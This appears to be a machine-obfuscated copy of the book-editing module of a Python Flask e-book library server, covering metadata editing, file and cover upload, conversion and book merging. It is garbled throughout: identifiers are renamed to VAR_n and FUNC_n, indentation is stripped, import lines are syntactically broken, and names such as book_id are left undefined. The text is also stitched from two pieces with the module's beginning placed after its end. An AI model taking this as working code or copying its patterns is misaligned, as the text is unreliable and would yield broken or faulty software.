VAR_84 = VAR_17.ratings[0].rating
VAR_85 = int(float(VAR_20["rating"]) * 2)
if VAR_85 != VAR_84:
VAR_48 = True
VAR_104 = calibre_db.session.query(db.Ratings).filter(db.Ratings.rating == VAR_85).first()
if VAR_104:
VAR_17.ratings.append(VAR_104)
else:
VAR_117 = db.Ratings(rating=VAR_85)
VAR_17.ratings.append(VAR_117)
if VAR_84:
VAR_17.ratings.remove(VAR_17.ratings[0])
else:
if len(VAR_17.ratings) > 0:
VAR_17.ratings.remove(VAR_17.ratings[0])
VAR_48 = True
return VAR_48
def FUNC_16(VAR_21, VAR_17):
VAR_57 = VAR_21.split(',')
VAR_57 = list(map(lambda it: it.strip(), VAR_57))
VAR_57 = helper.uniq(VAR_57)
return FUNC_7(VAR_57, VAR_17.tags, db.Tags, calibre_db.session, 'tags')
def FUNC_17(VAR_22, VAR_17):
VAR_58 = [VAR_22.strip()]
VAR_58 = [x for x in VAR_58 if x != '']
return FUNC_7(VAR_58, VAR_17.series, db.Series, calibre_db.session, 'series')
def FUNC_18(VAR_23, VAR_17):
VAR_39 = False
VAR_23 = VAR_23 or '1'
if not VAR_23.replace('.', '', 1).isdigit():
flash(_("%(seriesindex)s is not a valid number, skipping", seriesindex=VAR_23), category="warning")
return False
if VAR_17.series_index != VAR_23:
VAR_17.series_index = VAR_23
VAR_39 = True
return VAR_39
def FUNC_19(VAR_24, VAR_17):
VAR_39 = False
if len(VAR_17.comments):
if VAR_17.comments[0].text != VAR_24:
VAR_17.comments[0].text = VAR_24
VAR_39 = True
else:
if VAR_24:
VAR_17.comments.append(db.Comments(text=VAR_24, VAR_17=VAR_17.id))
VAR_39 = True
return VAR_39
def FUNC_20(VAR_25, VAR_17, VAR_26=False, VAR_27=None):
VAR_59 = VAR_25.split(',')
VAR_60 = []
if not VAR_26:
VAR_61 = isoLanguages.get_language_codes(get_locale(), VAR_59, VAR_60)
else:
VAR_61 = isoLanguages.get_valid_language_codes(get_locale(), VAR_59, VAR_60)
for l in VAR_60:
VAR_2.error('%s is not a valid language', l)
if isinstance(VAR_27, list):
VAR_27.append(l)
else:
flash(_(u"%(langname)s is not a valid language", langname=l), category="warning")
if VAR_26 and len(VAR_61) == 1:
if VAR_61[0] != current_user.filter_language() and current_user.filter_language() != "all":
VAR_61[0] = calibre_db.session.query(db.Languages). \
filter(db.Languages.lang_code == current_user.filter_language()).first().lang_code
VAR_61 = helper.uniq(VAR_61)
return FUNC_7(VAR_61, VAR_17.languages, db.Languages, calibre_db.session, 'languages')
def FUNC_21(VAR_28, VAR_17):
VAR_48 = False
if VAR_28:
VAR_86 = VAR_28.rstrip().strip()
if len(VAR_17.publishers) == 0 or (len(VAR_17.publishers) > 0 and VAR_86 != VAR_17.publishers[0].name):
VAR_48 |= FUNC_7([VAR_86], VAR_17.publishers, db.Publishers, calibre_db.session,
'publisher')
elif len(VAR_17.publishers):
VAR_48 |= FUNC_7([], VAR_17.publishers, db.Publishers, calibre_db.session, 'publisher')
return VAR_48
def FUNC_22(VAR_15, VAR_17, VAR_29, VAR_20, VAR_30, VAR_31):
VAR_48 = False
if VAR_20[VAR_31] == 'None':
VAR_20[VAR_31] = None
elif VAR_29.datatype == 'bool':
VAR_20[VAR_31] = 1 if VAR_20[VAR_31] == 'True' else 0
elif VAR_29.datatype == 'comments':
VAR_20[VAR_31] = Markup(VAR_20[VAR_31]).unescape()
elif VAR_29.datatype == 'datetime':
try:
VAR_20[VAR_31] = datetime.strptime(VAR_20[VAR_31], "%Y-%m-%d")
except ValueError:
VAR_20[VAR_31] = db.Books.DEFAULT_PUBDATE
if VAR_20[VAR_31] != VAR_30:
if VAR_30 is not None:
if VAR_20[VAR_31] is not None:
setattr(getattr(VAR_17, VAR_31)[0], 'value', VAR_20[VAR_31])
VAR_48 = True
else:
VAR_105 = getattr(VAR_17, VAR_31)[0]
getattr(VAR_17, VAR_31).remove(VAR_105)
calibre_db.session.delete(VAR_105)
VAR_48 = True
else:
VAR_87 = db.cc_classes[VAR_29.id]
VAR_88 = VAR_87(value=VAR_20[VAR_31], VAR_17=VAR_15)
calibre_db.session.add(VAR_88)
VAR_48 = True
return VAR_48, VAR_20
def FUNC_23(VAR_17, VAR_29, VAR_20, VAR_30, VAR_31):
VAR_48 = False
if VAR_29.datatype == 'rating':
VAR_20[VAR_31] = str(int(float(VAR_20[VAR_31]) * 2))
if VAR_20[VAR_31].strip() != VAR_30:
if VAR_30 is not None:
VAR_105 = getattr(VAR_17, VAR_31)[0]
getattr(VAR_17, VAR_31).remove(VAR_105)
if len(VAR_105.books) == 0:
calibre_db.session.delete(VAR_105)
VAR_48 = True
VAR_87 = db.cc_classes[VAR_29.id]
VAR_88 = calibre_db.session.query(VAR_87).filter(
VAR_87.value == VAR_20[VAR_31].strip()).first()
if VAR_88 is None:
VAR_88 = VAR_87(value=VAR_20[VAR_31].strip())
calibre_db.session.add(VAR_88)
VAR_48 = True
calibre_db.session.flush()
VAR_88 = calibre_db.session.query(VAR_87).filter(
VAR_87.value == VAR_20[VAR_31].strip()).first()
getattr(VAR_17, VAR_31).append(VAR_88)
return VAR_48, VAR_20
def FUNC_24(VAR_15, VAR_17, VAR_20):
VAR_48 = False
VAR_52 = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
for VAR_29 in VAR_52:
VAR_31 = "custom_column_" + str(VAR_29.id)
if not VAR_29.is_multiple:
if len(getattr(VAR_17, VAR_31)) > 0:
VAR_30 = getattr(VAR_17, VAR_31)[0].value
else:
VAR_30 = None
if VAR_20[VAR_31].strip():
if VAR_29.datatype in ['int', 'bool', 'float', "datetime", "comments"]:
VAR_48, VAR_20 = FUNC_22(VAR_15, VAR_17, VAR_29, VAR_20, VAR_30, VAR_31)
else:
VAR_48, VAR_20 = FUNC_23(VAR_17, VAR_29, VAR_20, VAR_30, VAR_31)
else:
if VAR_30 is not None:
VAR_105 = getattr(VAR_17, VAR_31)[0]
getattr(VAR_17, VAR_31).remove(VAR_105)
if not VAR_105.books or len(VAR_105.books) == 0:
calibre_db.session.delete(VAR_105)
VAR_48 = True
else:
VAR_57 = VAR_20[VAR_31].split(',')
VAR_57 = list(map(lambda it: it.strip(), VAR_57))
VAR_48 |= FUNC_7(VAR_57,
getattr(VAR_17, VAR_31),
db.cc_classes[VAR_29.id],
calibre_db.session,
'custom')
return VAR_48
def FUNC_25(VAR_32, VAR_17, VAR_15):
if 'btn-VAR_26-format' in VAR_32.files:
VAR_40 = VAR_32.files['btn-VAR_26-format']
if VAR_40.filename != '':
if not current_user.role_upload():
abort(403)
if '.' in VAR_40.filename:
VAR_96 = VAR_40.filename.rsplit('.', 1)[-1].lower()
if VAR_96 not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
flash(_("File extension '%(ext)s' is not allowed to be uploaded to this server", ext=VAR_96),
category="error")
return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
else:
flash(_('File to be uploaded must have an extension'), category="error")
return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
VAR_106 = VAR_17.path.rsplit('/', 1)[-1]
VAR_107 = os.path.normpath(os.path.join(config.config_calibre_dir, VAR_17.path))
VAR_108 = os.path.join(VAR_107, VAR_106 + '.' + VAR_96)
if not os.path.exists(VAR_107):
try:
os.makedirs(VAR_107)
except OSError:
flash(_(u"Failed to create VAR_72 %(path)s (Permission denied).", VAR_72=VAR_107), category="error")
return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
try:
VAR_40.save(VAR_108)
except OSError:
flash(_(u"Failed to store file %(file)s.", file=VAR_108), category="error")
return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
VAR_73 = os.path.getsize(VAR_108)
VAR_109 = calibre_db.get_book_format(VAR_15, VAR_96.upper())
if VAR_109:
VAR_2.warning('Book format %s already existing', VAR_96.upper())
else:
try:
VAR_119 = db.Data(VAR_15, VAR_96.upper(), VAR_73, VAR_106)
calibre_db.session.add(VAR_119)
calibre_db.session.commit()
calibre_db.update_title_sort(config)
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
VAR_2.error('Database VAR_49: %s', e)
flash(_(u"Database VAR_49: %(VAR_49)s.", VAR_49=e), category="error")
return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
VAR_110=_(u"File format %(ext)s added to %(VAR_17)s", ext=VAR_96.upper(), VAR_17=VAR_17.title)
WorkerThread.add(current_user.name, TaskUpload(
"<a href=\"" + url_for('web.show_book', VAR_15=VAR_17.id) + "\">" + VAR_110 + "</a>"))
return uploader.process(
VAR_108, *os.path.splitext(VAR_40.filename),
rarExecutable=config.config_rarfile_location)
def FUNC_26(VAR_32, VAR_17):
if 'btn-VAR_26-cover' in VAR_32.files:
VAR_40 = VAR_32.files['btn-VAR_26-cover']
if VAR_40.filename != '':
if not current_user.role_upload():
abort(403)
VAR_80, VAR_111 = helper.save_cover(VAR_40, VAR_17.path)
if VAR_80 is True:
return True
else:
flash(VAR_111, category="error")
return False
return None
def FUNC_27(VAR_17, VAR_33):
VAR_33 = book_title.rstrip().strip()
if VAR_17.title != VAR_33:
if VAR_33 == '':
VAR_33 = _(u'Unknown')
VAR_17.title = VAR_33
return True
return False
def FUNC_28(VAR_17, VAR_34, VAR_35=True):
VAR_62 = VAR_34.split('&')
VAR_62 = list(map(lambda it: it.strip().replace(',', '|'), VAR_62))
VAR_62 = helper.uniq(VAR_62)
if VAR_62 == ['']:
VAR_62 = [_(u'Unknown')] # prevent empty Author
VAR_63 = FUNC_7(VAR_62, VAR_17.authors, db.Authors, calibre_db.session, 'author')
VAR_64 = list()
for inp in VAR_62:
VAR_89 = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
if not VAR_89:
VAR_89 = helper.get_sorted_author(inp)
else:
VAR_89 = VAR_89.sort
VAR_64.append(helper.get_sorted_author(VAR_89))
VAR_65 = ' & '.join(VAR_64)
if VAR_17.author_sort != VAR_65 and VAR_35:
VAR_17.author_sort = VAR_65
VAR_63 = True
return VAR_62, VAR_63
@VAR_1.route("/admin/VAR_17/<int:VAR_15>", methods=['GET', 'POST'])
@login_required_if_no_ano
@FUNC_1
def FUNC_29(VAR_15):
VAR_39 = False
try:
calibre_db.update_title_sort(config)
except sqliteOperationalError as e:
VAR_2.debug_or_exception(e)
calibre_db.session.rollback()
if VAR_32.method != 'POST':
return FUNC_14(VAR_15)
VAR_17 = calibre_db.get_filtered_book(VAR_15, allow_show_archived=True)
if not VAR_17:
flash(_(u"Oops! Selected VAR_17 VAR_37 is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
VAR_36 = FUNC_25(VAR_32, VAR_17, VAR_15)
if FUNC_26(VAR_32, VAR_17) is True:
VAR_17.has_cover = 1
VAR_39 = True
try:
VAR_20 = VAR_32.form.to_dict()
FUNC_30(VAR_20, VAR_36)
VAR_90 = None
VAR_91 = FUNC_27(VAR_17, VAR_20["book_title"])
VAR_62, VAR_92 = FUNC_28(VAR_17, VAR_20["author_name"])
if VAR_92 or VAR_91:
VAR_90 = VAR_17.id
VAR_39 = True
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
VAR_49 = False
if VAR_90:
VAR_49 = helper.update_dir_stucture(VAR_90, config.config_calibre_dir, VAR_62[0])
if not VAR_49:
if "cover_url" in VAR_20:
if VAR_20["cover_url"]:
if not current_user.role_upload():
return "", (403)
if VAR_20["cover_url"].endswith('/static/generic_cover.jpg'):
VAR_17.has_cover = 0
else:
VAR_68, VAR_49 = helper.save_cover_from_url(VAR_20["cover_url"], VAR_17.path)
if VAR_68 is True:
VAR_17.has_cover = 1
VAR_39 = True
else:
flash(VAR_49, category="error")
VAR_39 |= FUNC_18(VAR_20["series_index"], VAR_17)
VAR_39 |= FUNC_19(Markup(VAR_20['description']).unescape(), VAR_17)
VAR_13 = FUNC_31(VAR_20, VAR_17)
VAR_112, VAR_19 = FUNC_8(VAR_13, VAR_17.identifiers, calibre_db.session)
if VAR_19:
flash(_("Identifiers are not Case Sensitive, Overwriting Old Identifier"), category="warning")
VAR_39 |= VAR_112
VAR_39 |= FUNC_16(VAR_20['tags'], VAR_17)
VAR_39 |= FUNC_17(VAR_20["series"], VAR_17)
VAR_39 |= FUNC_21(VAR_20['publisher'], VAR_17)
VAR_39 |= FUNC_20(VAR_20['languages'], VAR_17)
VAR_39 |= FUNC_15(VAR_20, VAR_17)
VAR_39 |= FUNC_24(VAR_15, VAR_17, VAR_20)
if VAR_20["pubdate"]:
try:
VAR_17.pubdate = datetime.strptime(VAR_20["pubdate"], "%Y-%m-%d")
except ValueError:
VAR_17.pubdate = db.Books.DEFAULT_PUBDATE
else:
VAR_17.pubdate = db.Books.DEFAULT_PUBDATE
if VAR_39:
VAR_17.last_modified = datetime.utcnow()
calibre_db.session.merge(VAR_17)
calibre_db.session.commit()
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
if "detail_view" in VAR_20:
return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
else:
flash(_("Metadata successfully updated"), category="success")
return FUNC_14(VAR_15)
else:
calibre_db.session.rollback()
flash(VAR_49, category="error")
return FUNC_14(VAR_15)
except Exception as ex:
VAR_2.debug_or_exception(ex)
calibre_db.session.rollback()
flash(_("Error editing VAR_17, please check logfile for details"), category="error")
return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
def FUNC_30(VAR_20, VAR_36):
if VAR_20['author_name'] == _(u'Unknown'):
VAR_20['author_name'] = ''
if VAR_20['book_title'] == _(u'Unknown'):
VAR_20['book_title'] = ''
for VAR_93, m_field in [
('tags', 'tags'), ('author_name', 'author'), ('series', 'series'),
('series_index', 'series_id'), ('languages', 'languages'),
('book_title', 'title')]:
VAR_20[VAR_93] = VAR_20[VAR_93] or getattr(VAR_36, m_field, '')
VAR_20["description"] = VAR_20["description"] or Markup(
getattr(VAR_36, 'description', '')).unescape()
def FUNC_31(VAR_20, VAR_17):
VAR_66 = 'identifier-type-'
VAR_67 = 'identifier-val-'
VAR_68 = []
for type_key, type_value in VAR_20.items():
if not type_key.startswith(VAR_66):
continue
VAR_94 = VAR_67 + type_key[len(VAR_66):]
if VAR_94 not in VAR_20.keys():
continue
VAR_68.append(db.Identifiers(VAR_20[VAR_94], type_value, VAR_17.id))
return VAR_68
def FUNC_32(VAR_37, VAR_38):
if VAR_37 != _(u'Unknown') and VAR_38 != _(u'Unknown'):
VAR_95 = calibre_db.check_exists_book(VAR_38, VAR_37)
if VAR_95:
VAR_2.info("Uploaded VAR_17 probably exists in library")
flash(_(u"Uploaded VAR_17 probably exists in the library, consider to VAR_63 before VAR_26 new: ")
+ Markup(render_title_template('book_exists_flash.html', VAR_95=entry)), category="warning")
VAR_62 = VAR_38.split('&')
VAR_62 = list(map(lambda it: it.strip().replace(',', '|'), VAR_62))
VAR_62 = helper.uniq(VAR_62)
if VAR_62 == ['']:
VAR_62 = [_(u'Unknown')] # prevent empty Author
VAR_64 = list()
VAR_69 = None
for inp in VAR_62:
VAR_89 = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
if not VAR_89:
if not VAR_69:
db_author = db.Authors(inp, helper.get_sorted_author(inp), "")
calibre_db.session.add(VAR_69)
calibre_db.session.commit()
VAR_113 = helper.get_sorted_author(inp)
else:
if not VAR_69:
db_author = VAR_89
VAR_113 = VAR_89.sort
VAR_64.append(VAR_113)
VAR_65 = ' & '.join(VAR_64)
return VAR_65, VAR_62, VAR_69
def FUNC_33(VAR_39, VAR_36):
VAR_37 = VAR_36.title
VAR_38 = VAR_36.author
VAR_65, VAR_62, VAR_69 = FUNC_32(VAR_37, VAR_38)
VAR_70 = helper.get_valid_filename(VAR_37)
VAR_71 = helper.get_valid_filename(VAR_69.name)
VAR_72 = os.path.join(VAR_71, VAR_70).replace('\\', '/')
VAR_41 = db.Books(VAR_37, "", VAR_65, datetime.utcnow(), datetime(101, 1, 1),
'1', datetime.utcnow(), VAR_72, VAR_36.cover, VAR_69, [], "")
VAR_39 |= FUNC_7(VAR_62, VAR_41.authors, db.Authors, calibre_db.session,
'author')
VAR_39 |= FUNC_18(VAR_36.series_id, VAR_41)
VAR_39 |= FUNC_20(VAR_36.languages, VAR_41, VAR_26=True)
VAR_39 |= FUNC_16(VAR_36.tags, VAR_41)
VAR_39 |= FUNC_21(VAR_36.publisher, VAR_41)
VAR_39 |= FUNC_17(VAR_36.series, VAR_41)
VAR_73 = os.path.getsize(VAR_36.file_path)
VAR_74 = db.Data(VAR_41, VAR_36.extension.upper()[1:], VAR_73, VAR_70)
VAR_41.data.append(VAR_74)
calibre_db.session.add(VAR_41)
calibre_db.session.flush()
return VAR_41, VAR_62, VAR_70
def FUNC_34(VAR_40):
if '.' in VAR_40.filename:
VAR_96 = VAR_40.filename.rsplit('.', 1)[-1].lower()
if VAR_96 not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
flash(
_("File extension '%(ext)s' is not allowed to be uploaded to this server",
ext=VAR_96), category="error")
return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
else:
flash(_('File to be uploaded must have an extension'), category="error")
return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
try:
VAR_36 = uploader.upload(VAR_40, config.config_rarfile_location)
except (IOError, OSError):
VAR_2.error("File %s could not saved to temp dir", VAR_40.filename)
flash(_(u"File %(filename)s could not saved to temp dir",
filename=VAR_40.filename), category="error")
return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
return VAR_36, None
def FUNC_35(VAR_36, VAR_41):
if VAR_36.cover:
VAR_97 = VAR_36.cover
else:
VAR_97 = os.path.join(constants.STATIC_DIR, 'generic_cover.jpg')
VAR_75 = os.path.join(config.config_calibre_dir, VAR_41.path, "cover.jpg")
try:
copyfile(VAR_97, VAR_75)
if VAR_36.cover:
os.unlink(VAR_36.cover)
except OSError as e:
VAR_2.error("Failed to move cover file %s: %s", VAR_75, e)
flash(_(u"Failed to Move Cover File %(file)s: %(VAR_49)s", file=VAR_75,
VAR_49=e),
category="error")
@VAR_1.route("/upload", methods=["GET", "POST"])
@login_required_if_no_ano
@FUNC_0
def VAR_26():
if not config.config_uploading:
abort(404)
if VAR_32.method == 'POST' and 'btn-upload' in VAR_32.files:
for VAR_40 in VAR_32.files.getlist("btn-upload"):
try:
VAR_39 = False
calibre_db.update_title_sort(config)
calibre_db.session.connection().connection.connection.create_function('uuid4', 0, lambda: str(uuid4()))
VAR_36, VAR_49 = FUNC_34(VAR_40)
if VAR_49:
return VAR_49
VAR_41, VAR_62, VAR_70 = FUNC_33(VAR_39, VAR_36)
VAR_39 |= FUNC_19(Markup(VAR_36.description).unescape(), VAR_41)
VAR_15 = VAR_41.id
VAR_37 = VAR_41.title
VAR_49 = helper.update_dir_structure_file(VAR_15,
config.config_calibre_dir,
VAR_62[0],
VAR_36.file_path,
VAR_70 + VAR_36.extension.lower())
FUNC_35(VAR_36, VAR_41)
calibre_db.session.commit()
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
if VAR_49:
flash(VAR_49, category="error")
VAR_110=_(u"File %(file)s uploaded", file=VAR_37)
WorkerThread.add(current_user.name, TaskUpload(
"<a href=\"" + url_for('web.show_book', VAR_15=book_id) + "\">" + VAR_110 + "</a>"))
if len(VAR_32.files.getlist("btn-upload")) < 2:
if current_user.role_edit() or current_user.role_admin():
VAR_120 = {"location": url_for('editbook.edit_book', VAR_15=book_id)}
return Response(json.dumps(VAR_120), mimetype='application/json')
else:
VAR_120 = {"location": url_for('web.show_book', VAR_15=book_id)}
return Response(json.dumps(VAR_120), mimetype='application/json')
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
VAR_2.error("Database VAR_49: %s", e)
flash(_(u"Database VAR_49: %(VAR_49)s.", VAR_49=e), category="error")
return Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
@VAR_1.route("/admin/VAR_17/convert/<int:VAR_15>", methods=['POST'])
@login_required_if_no_ano
@FUNC_1
def FUNC_37(VAR_15):
VAR_76 = VAR_32.form.get('book_format_from', None)
VAR_77 = VAR_32.form.get('book_format_to', None)
if (VAR_76 is None) or (VAR_77 is None):
flash(_(u"Source or destination format for conversion missing"), category="error")
return redirect(url_for('editbook.edit_book', VAR_15=book_id))
VAR_2.info('converting: VAR_17 id: %s from: %s to: %s', VAR_15, VAR_76, VAR_77)
VAR_78 = helper.convert_book_format(VAR_15, config.config_calibre_dir, VAR_76.upper(),
VAR_77.upper(), current_user.name)
if VAR_78 is None:
flash(_(u"Book successfully queued for converting to %(VAR_16)s",
VAR_16=VAR_77),
category="success")
else:
flash(_(u"There was an VAR_49 converting this VAR_17: %(res)s", res=VAR_78), category="error")
return redirect(url_for('editbook.edit_book', VAR_15=book_id))
@VAR_1.route("/scholarsearch/<VAR_42>",methods=['GET'])
@login_required_if_no_ano
@FUNC_1
def FUNC_38(VAR_42):
if VAR_0:
VAR_98 = scholarly.search_pubs(' '.join(VAR_42.split('+')))
VAR_99=0
VAR_68 = []
for publication in VAR_98:
del publication['source']
VAR_68.append(publication)
VAR_99+=1
if(VAR_99>=10):
break
return Response(json.dumps(VAR_68),mimetype='application/json')
else:
return "[]"
@VAR_1.route("/ajax/editbooks/<VAR_43>", methods=['POST'])
@login_required_if_no_ano
@FUNC_1
def FUNC_39(VAR_43):
VAR_79 = VAR_32.form.to_dict()
VAR_17 = calibre_db.get_book(VAR_79['pk'])
VAR_80 = ""
if VAR_43 =='series_index':
FUNC_18(VAR_79['value'], VAR_17)
VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_17.series_index}), mimetype='application/json')
elif VAR_43 =='tags':
FUNC_16(VAR_79['value'], VAR_17)
VAR_80 = Response(json.dumps({'success': True, 'newValue': ', '.join([tag.name for tag in VAR_17.tags])}),
mimetype='application/json')
elif VAR_43 =='series':
FUNC_17(VAR_79['value'], VAR_17)
VAR_80 = Response(json.dumps({'success': True, 'newValue': ', '.join([serie.name for serie in VAR_17.series])}),
mimetype='application/json')
elif VAR_43 =='publishers':
FUNC_21(VAR_79['value'], VAR_17)
VAR_80 = Response(json.dumps({'success': True,
'newValue': ', '.join([VAR_86.name for VAR_86 in VAR_17.publishers])}),
mimetype='application/json')
elif VAR_43 =='languages':
VAR_27 = list()
FUNC_20(VAR_79['value'], VAR_17, VAR_27=invalid)
if VAR_27:
VAR_80 = Response(json.dumps({'success': False,
'msg': 'Invalid VAR_25 in VAR_32: {}'.format(','.join(VAR_27))}),
mimetype='application/json')
else:
VAR_121 = list()
for lang in VAR_17.languages:
try:
VAR_121.append(LC.parse(lang.lang_code).get_language_name(get_locale()))
except UnknownLocaleError:
VAR_121.append(_(isoLanguages.get(part3=lang.lang_code).name))
VAR_80 = Response(json.dumps({'success': True, 'newValue': ', '.join(VAR_121)}),
mimetype='application/json')
elif VAR_43 =='author_sort':
VAR_17.author_sort = VAR_79['value']
VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_17.author_sort}),
mimetype='application/json')
elif VAR_43 == 'title':
VAR_124 = VAR_17.sort
FUNC_27(VAR_17, VAR_79.get('value', ""))
helper.update_dir_stucture(VAR_17.id, config.config_calibre_dir)
VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_17.title}),
mimetype='application/json')
elif VAR_43 =='sort':
VAR_17.sort = VAR_79['value']
VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_17.sort}),
mimetype='application/json')
elif VAR_43 =='authors':
VAR_62, VAR_125 = FUNC_28(VAR_17, VAR_79['value'], VAR_79.get('checkA', None) == "true")
helper.update_dir_stucture(VAR_17.id, config.config_calibre_dir, VAR_62[0])
VAR_80 = Response(json.dumps({'success': True,
'newValue': ' & '.join([author.replace('|',',') for author in VAR_62])}),
mimetype='application/json')
VAR_17.last_modified = datetime.utcnow()
try:
calibre_db.session.commit()
if VAR_43 == 'title' and VAR_79.get('checkT') == "false":
VAR_17.sort = VAR_124
calibre_db.session.commit()
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
VAR_2.error("Database VAR_49: %s", e)
return VAR_80
@VAR_1.route("/ajax/sort_value/<VAR_44>/<int:VAR_45>")
@login_required
def FUNC_40(VAR_44, VAR_45):
if VAR_44 in ['title', 'authors', 'sort', 'author_sort']:
VAR_17 = calibre_db.get_filtered_book(VAR_45)
if VAR_17:
if VAR_44 == 'title':
return json.dumps({'sort': VAR_17.sort})
elif VAR_44 == 'authors':
return json.dumps({'author_sort': VAR_17.author_sort})
if VAR_44 == 'sort':
return json.dumps({'sort': VAR_17.title})
if VAR_44 == 'author_sort':
return json.dumps({'author_sort': VAR_17.author})
return ""
@VAR_1.route("/ajax/simulatemerge", methods=['POST'])
@login_required
@FUNC_1
def FUNC_41():
VAR_79 = VAR_32.get_json().get('Merge_books')
if VAR_79:
VAR_100 = calibre_db.get_book(VAR_79[0]).title
VAR_79.pop(0)
if VAR_100:
for VAR_15 in VAR_79:
VAR_118 = []
VAR_118.append(calibre_db.get_book(VAR_15).title)
return json.dumps({'to': VAR_100, 'from': VAR_118})
return ""
@VAR_1.route("/ajax/mergebooks", methods=['POST'])
@login_required
@FUNC_1
def FUNC_42():
VAR_79 = VAR_32.get_json().get('Merge_books')
VAR_81 = list()
if VAR_79:
VAR_100 = calibre_db.get_book(VAR_79[0])
VAR_79.pop(0)
if VAR_100:
for file in VAR_100.data:
VAR_81.append(file.format)
VAR_114 = helper.get_valid_filename(VAR_100.title) + ' - ' + \
helper.get_valid_filename(VAR_100.authors[0].name)
for VAR_15 in VAR_79:
VAR_118 = calibre_db.get_book(VAR_15)
if VAR_118:
for element in VAR_118.data:
if element.format not in VAR_81:
VAR_122 = os.path.normpath(os.path.join(config.config_calibre_dir,
VAR_100.path,
VAR_114 + "." + element.format.lower()))
VAR_123 = os.path.normpath(os.path.join(config.config_calibre_dir,
VAR_118.path,
element.name + "." + element.format.lower()))
copyfile(VAR_123, VAR_122)
VAR_100.data.append(db.Data(VAR_100.id,
element.format,
element.uncompressed_size,
VAR_114))
FUNC_13(VAR_118.id,"", True)
return json.dumps({'success': True})
return ""
@VAR_1.route("/ajax/xchange", methods=['POST'])
@login_required
@FUNC_1
def FUNC_43():
VAR_79 = VAR_32.get_json().get('xchange')
if VAR_79:
for val in VAR_79:
VAR_39 = False
VAR_17 = calibre_db.get_book(val)
VAR_115 = VAR_17.title
VAR_116 = calibre_db.order_authors(VAR_17)
VAR_53 = []
for VAR_38 in VAR_116.authors:
VAR_53.append(VAR_38.name.replace('|', ','))
VAR_91 = FUNC_27(VAR_17, " ".join(VAR_53))
VAR_62, VAR_92 = FUNC_28(VAR_17, VAR_115)
if VAR_92 or VAR_91:
VAR_90 = VAR_17.id
VAR_39 = True
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
if VAR_90:
helper.update_dir_stucture(VAR_90, config.config_calibre_dir, VAR_62[0])
if VAR_39:
VAR_17.last_modified = datetime.utcnow()
try:
calibre_db.session.commit()
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
VAR_2.error("Database VAR_49: %s", e)
return json.dumps({'success': False})
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
return json.dumps({'success': True})
return ""
|
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
from shutil import .copyfile
from uuid import uuid4
from lxml.html.clean import .clean_html
try:
from scholarly import scholarly
VAR_45 = True
except ImportError:
VAR_45 = False
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, VAR_31, flash, redirect, url_for, abort, Markup, Response
from flask_babel import gettext as _
from flask_login import .current_user, login_required
from sqlalchemy.exc import OperationalError, IntegrityError
from sqlite3 import OperationalError as sqliteOperationalError
from . import .constants, logger, isoLanguages, gdriveutils, uploader, helper
from . import .config, get_locale, ub, db
from . import .calibre_db
from .services.worker import WorkerThread
from .tasks.upload import TaskUpload
from .render_template import render_title_template
from .usermanagement import .login_required_if_no_ano
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
VAR_0 = Blueprint('editbook', __name__)
VAR_1 = logger.create()
def FUNC_0(VAR_2):
@wraps(VAR_2)
def FUNC_44(*VAR_46, **VAR_47):
if current_user.role_upload() or current_user.role_admin():
return VAR_2(*VAR_46, **VAR_47)
abort(403)
return FUNC_44
def FUNC_1(VAR_2):
@wraps(VAR_2)
def FUNC_44(*VAR_46, **VAR_47):
if current_user.role_edit() or current_user.role_admin():
return VAR_2(*VAR_46, **VAR_47)
abort(403)
return FUNC_44
def FUNC_2(VAR_3, VAR_4, VAR_5):
VAR_7 = []
for c_elements in VAR_3:
VAR_82 = False
if VAR_4 == 'languages':
VAR_101 = c_elements.lang_code
elif VAR_4 == 'custom':
VAR_101 = c_elements.value
else:
VAR_101 = c_elements.name
for inp_element in VAR_5:
if inp_element.lower() == VAR_101.lower():
VAR_82 = True
break
if not VAR_82:
VAR_7.append(c_elements)
return VAR_7
def FUNC_3(VAR_3, VAR_4, VAR_5):
VAR_9 = []
for inp_element in VAR_5:
VAR_82 = False
for c_elements in VAR_3:
if VAR_4 == 'languages':
VAR_101 = c_elements.lang_code
elif VAR_4 == 'custom':
VAR_101 = c_elements.value
else:
VAR_101 = c_elements.name
if inp_element == VAR_101:
VAR_82 = True
break
if not VAR_82:
VAR_9.append(inp_element)
return VAR_9
def FUNC_4(VAR_3, VAR_6, VAR_7):
VAR_48 = False
if len(VAR_7) > 0:
for del_element in VAR_7:
VAR_3.remove(del_element)
VAR_48 = True
if len(del_element.books) == 0:
VAR_6.delete(del_element)
return VAR_48
def FUNC_5(VAR_3, VAR_8, VAR_6, VAR_4, VAR_9):
VAR_48 = False
